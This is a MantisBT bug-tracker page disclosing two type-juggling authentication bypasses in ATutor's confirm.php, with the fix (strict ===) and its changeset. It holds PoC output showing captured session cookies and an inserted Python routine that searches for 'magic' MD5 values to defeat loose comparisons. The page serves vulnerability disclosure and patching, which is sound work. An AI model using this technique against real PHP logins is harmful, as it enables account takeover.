MantisBT

View Issue Details
ID: 0005653
Project: ATutor
Category: atutor.ca
View Status: public
Date Submitted: 2016-03-17 16:46
Last Update: 2016-06-30 17:43
Reporter: mr_me
Assigned To: mr_me
Priority: immediate
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Platform / OS / OS Version: not given
Product Version: 2.2.1
Target Version: 2.2.1
Fixed in Version: 2.2.2
Summary: 0005653: confirm.php PHP type juggling authentication bypass vulnerabilities
Description: So, there are 2 authentication bypass vulnerabilities within the confirm.php script.

1. update email type juggling authentication bypass
```````````````````````````````````````````
This occurs on line 36:

if ($code == $m) {

This code is vulnerable to an authentication bypass due to the loose ==. To patch this just change the == to ===.

impact:
```````
The ability for an attacker to change the email address of any member; the attacker can then reset the password of the member via email and log in, thus bypassing authentication.

2. auto login type juggling authentication bypass
```````````````````````````````````````````
This occurs on line 151:

if ($row['member_id'] != '' && isset($_REQUEST['code']) && $_REQUEST['code'] == $code)

This code is vulnerable to an authentication bypass due to the loose ==. To patch this just change the == to ===.

impact:
```````
The ability for an attacker to achieve a valid session as the targeted member_id and bypass authentication.
Steps To Reproduce: change the targets inside the test PoCs to your server's IP

saturn:tj mr_me$ python auto-login-poc.py
(+) found a word! aaaaacr7
(+) made a total of 3238 requests
(+) this is an authenticated cookie: ATutorID=p7ebudi85goj76q2pkuerskb44; path=/ATutor/, ATutorID=ec6up2htdjrondhons16bp8cc3; path=/ATutor/, ATutorID=ec6up2htdjrondhons16bp8cc3; path=/ATutor/ <-- this is the session to use

saturn:tj mr_me$ ./update-email-poc.py sourceincite.com
(+) found a valid email! aaaaai0m@sourceincite.com
(+) made a total of 11317 requests

As you can see, the number of requests made to the server is reasonable and takes very little time for an attacker to bypass authentication.



Additional Information: https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
Tags: No tags attached.
Affects version: SVN
SVN Revision#: a8a8c1e..2eed42a
Attached Files: auto-login-poc.py (1,202 bytes) 2016-03-17 16:46
update-email-poc.py (834 bytes) 2016-03-17 16:46
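
Both checks in the report fail for the same reason: PHP's loose == on two strings compares them as numbers whenever both look numeric, so a hex digest of the form "0e" followed only by digits is equal to "0". The Python below is an added illustration, not ATutor code and not the attached PoCs (which are not reproduced on this page). It models the PHP numeric-string rule, shows why === closes the hole, and implements the offline search an attacker runs when the server-side value is an MD5 hex digest that the attacker's own input feeds into. The hash_len parameter (a server comparing only a truncated digest), the [a-z0-9] candidate alphabet and the "aaaa" prefix are assumptions for the demo; the report does not say how $code or $m is derived.

```python
"""Model of PHP's loose string comparison and the 'magic hash' search that
defeats it.  Added illustration only: not ATutor code and not the attached PoCs."""
import hashlib
import itertools
import re
import string

# A PHP numeric string: optional leading whitespace, optional sign, digits with
# an optional fraction, optional exponent (PHP 7 rules; PHP 8 also tolerates
# trailing whitespace).  This regex is a model of the rule, not PHP itself.
_NUMERIC = re.compile(r"^[ \t\n\r\v\f]*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_is_numeric(s: str) -> bool:
    return _NUMERIC.match(s) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """Approximates `$a == $b` for two PHP strings: when both look numeric they
    are compared as numbers, so "0e123" == "0" and "0e123" == "0e999" hold."""
    if php_is_numeric(a) and php_is_numeric(b):
        return float(a) == float(b)
    return a == b


def php_strict_eq(a: str, b: str) -> bool:
    """`$a === $b`: same type and same bytes, the fix applied in confirm.php."""
    return a == b


def is_magic(hexdigest: str) -> bool:
    """A hex digest PHP reads as the number zero: '0e' followed only by digits."""
    return hexdigest.startswith("0e") and hexdigest[2:].isdigit()


def md5_prefix(s: str, hash_len: int = 32) -> str:
    """Lowercase hex MD5 of s, truncated to hash_len characters."""
    return hashlib.md5(s.encode()).hexdigest()[:hash_len]


def expected_tries(hash_len: int) -> float:
    """Mean random candidates before an md5 prefix of hash_len hex chars is magic:
    P = (1/16)^2 for the leading '0e' times (10/16)^(hash_len - 2) for digits."""
    return 1.0 / ((1 / 16) ** 2 * (10 / 16) ** (hash_len - 2))


def find_magic(prefix: str, hash_len: int = 32, max_tries: int = 5_000_000):
    """Enumerate prefix+suffix over [a-z0-9] until md5(candidate)[:hash_len] is
    magic.  Returns (candidate, digest_prefix, tries), or None if max_tries is
    reached.  hash_len < 32 models a server comparing a truncated digest; that
    is an assumption for the demo, not something the report states."""
    alphabet = string.ascii_lowercase + string.digits
    tries = 0
    for n in itertools.count(1):
        for suffix in itertools.product(alphabet, repeat=n):
            tries += 1
            cand = prefix + "".join(suffix)
            digest = md5_prefix(cand, hash_len)
            if is_magic(digest):
                return cand, digest, tries
            if tries >= max_tries:
                return None


if __name__ == "__main__":
    # Well-known full-length magic MD5: md5("240610708") starts with "0e" + digits.
    full = md5_prefix("240610708")
    print(full, is_magic(full), php_loose_eq("0", full), php_strict_eq("0", full))
    # A full 32-char digest needs hundreds of millions of tries; a 10-char
    # prefix needs on the order of ten thousand, i.e. minutes over HTTP.
    print("expected tries, 32 hex chars: %.0f" % expected_tries(32))
    print("expected tries, 10 hex chars: %.0f" % expected_tries(10))
    print(find_magic("aaaa", hash_len=10))
```

expected_tries(10) comes out near 11,000, the same order of magnitude as the request counts in the PoC output above, but whether ATutor truncates its digest that way is not stated on this page. The strict comparison fixes both sites because === compares the bytes, not the parsed numbers; the numeric-string rule is unchanged in PHP 8 (its "saner string to number comparisons" only altered comparisons between a number and a non-numeric string), so === remains the correct patch on current PHP as well.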

- Relationships

- Notes
(0007345)
mr_me (developer)
2016-03-17 16:48

Also, please note: I do have fully automated exploits for this issue that I have combined with the zip file issues that allow full, unauthenticated, remote code execution. As you can see, these issues are quite serious.
(0007354)
greg (administrator)
2016-03-19 14:10

replaced loose with strict comparison (===)
(0007371)
greg (administrator)
2016-03-23 20:12

credit to mr_me
(0007444)
greg (administrator)
2016-06-30 17:43

Close for 2.2.2

- Related Changesets
ATutor: master 2eed42a7
Timestamp: 2016-03-19 14:08:41
Author: greg
5653 replaced loose with strict comparison
mod - confirm.php

- Issue History
Date Modified Username Field Change
2016-03-17 16:46 mr_me New Issue
2016-03-17 16:46 mr_me Status new => assigned
2016-03-17 16:46 mr_me Assigned To => greg
2016-03-17 16:46 mr_me File Added: auto-login-poc.py
2016-03-17 16:46 mr_me File Added: update-email-poc.py
2016-03-17 16:48 mr_me Note Added: 0007345
2016-03-19 14:10 greg SVN Revision# => a8a8c1e..2eed42a
2016-03-19 14:10 greg Note Added: 0007354
2016-03-19 14:10 greg Status assigned => resolved
2016-03-19 14:10 greg Fixed in Version => 2.2.2
2016-03-19 14:10 greg Resolution open => fixed
2016-03-23 20:11 greg Assigned To greg => mr_me
2016-03-23 20:11 greg Status resolved => assigned
2016-03-23 20:12 greg Note Added: 0007371
2016-03-23 20:12 greg Status assigned => resolved
2016-04-16 16:16 greg Changeset attached => ATutor master 2eed42a7
2016-06-30 17:43 greg Note Added: 0007444
2016-06-30 17:43 greg Status resolved => closed


Copyright © 2000 - 2017 MantisBT Team
Powered by Mantis Bugtracker